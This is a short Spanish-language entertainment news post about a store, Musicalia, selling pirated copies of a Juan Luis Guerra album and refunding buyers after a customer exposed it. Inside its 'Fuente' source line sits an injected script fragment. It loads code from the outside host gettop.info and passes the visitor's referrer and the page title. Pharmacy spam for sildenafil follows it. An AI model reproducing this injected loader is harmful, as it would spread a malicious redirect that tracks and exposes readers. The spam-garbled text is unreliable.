Home / Publicaciones / Entretenimiento / Tienda Presenta Problemas Por Venta de CDs Pirateados de Juan Luis Guerra

Tienda Presenta Problemas Por Venta de CDs Pirateados de Juan Luis Guerra

Una de las últimas tiendas que todavía existe en el mercado en las ventas de CDs “Musicalia”, estaba vendiendo el disco original mas reciente de Juan Luis Guerra< !more> a un precio de 650 pesos. Algunas personas adquirieron la producción, una de ellas Lissette Selman, quien se dio cuenta por medio a las redes sociales del artista, que este material solo estaba disponible en el Club de Lectores del Listín Diario.

La Sra. Selman inmediatamente hizo eco de la información mediante sus redes sociales e informo: “Ayer compre el disco en Musicalia y me pareció extraño  que la caratula del disco tenía poca calidad y por dentro en blanco, también no emitieron factura de la compra, alegando que el sistema estaba defectuoso.

La tienda Musicalia cuando se vio entre la espada y la pared al ser descubiertos, tuvo que devolver el dinero a todas las personas que habían comprado el supuesto disco pirateado.

Fuente: masvips.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; forzak sildenafil 50 mg

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...